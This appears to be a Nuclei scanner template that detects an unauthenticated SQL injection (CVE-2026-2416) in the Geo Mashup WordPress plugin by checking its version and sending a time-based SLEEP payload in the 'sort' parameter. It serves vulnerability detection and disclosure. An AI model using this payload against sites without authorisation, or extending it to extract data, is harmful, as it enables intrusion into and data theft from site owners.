id: CVE-2026-2416 info: name: Geo Mashup <= 1.13.17 - SQL Injection author: Shivam Kamboj severity: high description: | Geo Mashup WordPress plugin <= 1.13.17 contains a SQL injection caused by insufficient escaping of the 'sort' parameter, letting unauthenticated attackers extract sensitive database information remotely. impact: | Unauthenticated attackers can extract sensitive database information, leading to data disclosure and potential further compromise. remediation: Update to the latest version beyond 1.13.17. reference: - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/geo-mashup/geo-mashup-11317-unauthenticated-sql-injection-via-sort-parameter - https://nvd.nist.gov/vuln/detail/CVE-2026-2416 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2026-2416 epss-score: 0.01392 epss-percentile: 0.68689 cwe-id: CWE-89 metadata: verified: true max-request: 1 tags: cve,cve2026,wordpress,wp,wp-plugin,sqli,geo-mashup,unauth flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/geo-mashup/readme.txt" matchers: - type: dsl dsl: - "status_code == 200" - compare_versions(version, '<= 1.13.17') condition: and internal: true extractors: - type: regex part: body name: version group: 1 regex: - 'Stable tag: ([0-9.]+)' internal: true - raw: - | @timeout: 30s GET /wp-admin/admin-ajax.php?action=geo_mashup_query&output=json&sort=(SELECT(0)FROM(SELECT(SLEEP(8)))a) HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 matchers: - type: dsl dsl: - 'duration >= 8' - 'status_code == 200' - 'contains(body, "objects")' - 'contains(content_type, "application/json")' condition: and # digest: 4a0a004730450221009ef6eca5c432a1fe886515d9b707f66aacc553d0ef7d8696806fa693cadad8f3022025d3e5c5ce636f5685074420662906857465e5dd87c42080d4edeff13666dc91:922c64590222798bb761d5b6d8e72950